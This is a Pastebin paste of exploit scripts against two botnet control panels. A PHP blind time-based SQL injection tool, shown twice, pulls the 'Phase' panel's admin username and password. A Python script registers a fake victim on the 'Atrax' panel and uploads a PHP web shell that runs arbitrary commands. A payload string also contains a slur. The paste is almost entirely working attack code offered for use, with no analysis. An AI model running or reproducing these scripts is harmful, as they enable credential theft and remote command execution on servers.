Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- shell: <?php
- // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
- // Start with PHP CLI (php pwn.php)
- set_time_limit(0);
- // Adjust this :)
- define('SLEEP_TIME', '4');
- define('PAGE_TIME', 4);
- define('URL', 'http://localhost/Phase/');
- echo('attacking ' . URL . PHP_EOL);
- get_string('username');
- get_string('password');
- function get_length($field) {
- $length = 1;
- while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
- ++$length;
- }
- echo($field . ' length: ' . $length . PHP_EOL);
- return $length;
- }
- function get_string($field) {
- $length = get_length($field);
- $str = '';
- for ($i = 0; $i < $length; ++$i) {
- $str .= chr(get_char($field, $i));
- echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
- }
- return $str;
- }
- function get_char($field, $id) {
- $binary = '';
- for ($i = 1; $i < 256; $i *= 2) {
- if ($i == 128)
- $binary = '0' . $binary;
- else
- $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
- }
- return bindec($binary);
- }
- function is_true($query) {
- $rc4_key = 'aaaa'; // b d u
- $data = 'u=tapz&d=faggot&b=lol';
- $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
- $encode = $rc4_key . $encode;
- $injection = urlencode($query);
- $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
- return !($req['time'] < PAGE_TIME);
- }
- function post_request($url, $data) {
- $handle = curl_init($url);
- curl_setopt($handle, CURLOPT_HEADER, false);
- curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
- curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($handle, CURLOPT_POST, true);
- curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
- curl_setopt($handle, CURLOPT_TIMEOUT, 30);
- $time = microtime(true);
- $page = curl_exec($handle);
- $time = microtime(true) - $time;
- curl_close($handle);
- return array(
- 'page' => $page,
- 'time' => $time
- );
- }
- function rc4($pwd, $data, $data_length, $pwd_length){
- $key[] = '';
- $box[] = '';
- $cipher = '';
- for ($i = 0; $i < 256; $i++)
- {
- $key[$i] = ord($pwd[$i % $pwd_length]);
- $box[$i] = $i;
- }
- for ($j = $i = 0; $i < 256; $i++)
- {
- $j = ($j + $box[$i] + $key[$i]) % 256;
- $tmp = $box[$i];
- $box[$i] = $box[$j];
- $box[$j] = $tmp;
- }
- for ($a = $j = $i = 0; $i < $data_length; $i++)
- {
- $a = ($a + 1) % 256;
- $j = ($j + $box[$a]) % 256;
- $tmp = $box[$a];
- $box[$a] = $box[$j];
- $box[$j] = $tmp;
- $k = $box[(($box[$a] + $box[$j]) % 256)];
- $cipher .= chr(ord($data[$i]) ^ $k);
- }
- return $cipher;
- }
- creds to: Xytilol
- Atrax botnet
- ==============
- Type: Shell Upload
- Shell: #!/usr/bin/python
- import random
- import string
- import base64
- import urllib
- import urllib2
- # <CONFIG>
- payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
- url = 'http://localhost/atrax/'
- # </CONFIG>
- BOT_MODE_INSERT = 'b' # BOT MODE
- BOT_MODE_RUNPLUGIN = 'e'
- GET_PARAM_MODE = 'a' # GET PARAM
- POST_PARAM_GUID = 'h' # POST PARAM
- POST_PARAM_IP = 'i'
- POST_PARAM_BUILDID = 'j'
- POST_PARAM_PC = 'k'
- POST_PARAM_OS = 'l'
- POST_PARAM_ADMIN = 'm'
- POST_PARAM_CPU = 'n'
- POST_PARAM_GPU = 'o'
- POST_PARAM_PLUGINNAME = 'q'
- def request(url, get, post):
- if not get == '':
- url += '?' + get
- encoded = {}
- if not post == '':
- for _ in post.split('&'):
- data = _.split('=')
- encoded[data[0]] = data[1]
- encoded = urllib.urlencode(encoded)
- request = urllib2.Request(url, encoded)
- response = urllib2.urlopen(request)
- page = response.read()
- return page
- def queryValue(key, value, next=True):
- ret = key + '=' + value
- if next:
- ret += '&'
- return ret
- def randomString(length = 8):
- return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
- def createVictim(url, guid, ip):
- get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
- post = queryValue(POST_PARAM_GUID, guid)
- post += queryValue(POST_PARAM_IP, ip)
- post += queryValue(POST_PARAM_BUILDID, randomString())
- post += queryValue(POST_PARAM_PC, randomString())
- post += queryValue(POST_PARAM_OS, randomString())
- post += queryValue(POST_PARAM_ADMIN, 'yes')
- post += queryValue(POST_PARAM_CPU, randomString())
- post += queryValue(POST_PARAM_GPU, randomString(), False)
- return request(url + 'auth.php', get, post)
- def exploit(url, guid, ip, file, payload):
- get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
- post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
- post += queryValue(POST_PARAM_GUID, guid)
- post += queryValue(POST_PARAM_IP, ip)
- post += queryValue('am', randomString())
- post += queryValue('ad', file)
- post += queryValue('ab', base64.b64encode(payload))
- post += queryValue('ai', '18', False)
- request(url + 'auth.php', get, post)
- def testExploit(url, guid, ip):
- file = randomString() + '.php'
- payload = '<?php echo("1337"); ?>'
- exploit(url, guid, ip, file, payload)
- return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
- guid = '7461707a7461707a7461707a7461707a'
- ip = '91.224.13.103'
- file = randomString() + '.php'
- if createVictim(url, guid, ip).strip() == 'STOP':
- print '[-] Cannot create victim...'
- else:
- print '[~] Victim created/updated...'
- if testExploit(url, guid, ip):
- exploit(url, guid, ip, file, payload)
- print '[+] Exploit uploaded!'
- print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
- else:
- print '[-] Cannot upload payload, maybe the plugin is not actived?'
- Phase botnet
- ===============
- Type: blind SQLi
- Vuln: <?php
- // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
- // Start with PHP CLI (php pwn.php)
- set_time_limit(0);
- // Adjust this :)
- define('SLEEP_TIME', '4');
- define('PAGE_TIME', 4);
- define('URL', 'http://localhost/Phase/');
- echo('attacking ' . URL . PHP_EOL);
- get_string('username');
- get_string('password');
- function get_length($field) {
- $length = 1;
- while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
- ++$length;
- }
- echo($field . ' length: ' . $length . PHP_EOL);
- return $length;
- }
- function get_string($field) {
- $length = get_length($field);
- $str = '';
- for ($i = 0; $i < $length; ++$i) {
- $str .= chr(get_char($field, $i));
- echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
- }
- return $str;
- }
- function get_char($field, $id) {
- $binary = '';
- for ($i = 1; $i < 256; $i *= 2) {
- if ($i == 128)
- $binary = '0' . $binary;
- else
- $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
- }
- return bindec($binary);
- }
- function is_true($query) {
- $rc4_key = 'aaaa'; // b d u
- $data = 'u=tapz&d=faggot&b=lol';
- $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
- $encode = $rc4_key . $encode;
- $injection = urlencode($query);
- $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
- return !($req['time'] < PAGE_TIME);
- }
- function post_request($url, $data) {
- $handle = curl_init($url);
- curl_setopt($handle, CURLOPT_HEADER, false);
- curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
- curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($handle, CURLOPT_POST, true);
- curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
- curl_setopt($handle, CURLOPT_TIMEOUT, 30);
- $time = microtime(true);
- $page = curl_exec($handle);
- $time = microtime(true) - $time;
- curl_close($handle);
- return array(
- 'page' => $page,
- 'time' => $time
- );
- }
- function rc4($pwd, $data, $data_length, $pwd_length){
- $key[] = '';
- $box[] = '';
- $cipher = '';
- for ($i = 0; $i < 256; $i++)
- {
- $key[$i] = ord($pwd[$i % $pwd_length]);
- $box[$i] = $i;
- }
- for ($j = $i = 0; $i < 256; $i++)
- {
- $j = ($j + $box[$i] + $key[$i]) % 256;
- $tmp = $box[$i];
- $box[$i] = $box[$j];
- $box[$j] = $tmp;
- }
- for ($a = $j = $i = 0; $i < $data_length; $i++)
- {
- $a = ($a + 1) % 256;
- $j = ($j + $box[$a]) % 256;
- $tmp = $box[$a];
- $box[$a] = $box[$j];
- $box[$j] = $tmp;
- $k = $box[(($box[$a] + $box[$j]) % 256)];
- $cipher .= chr(ord($data[$i]) ^ $k);
- }
- return $cipher;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement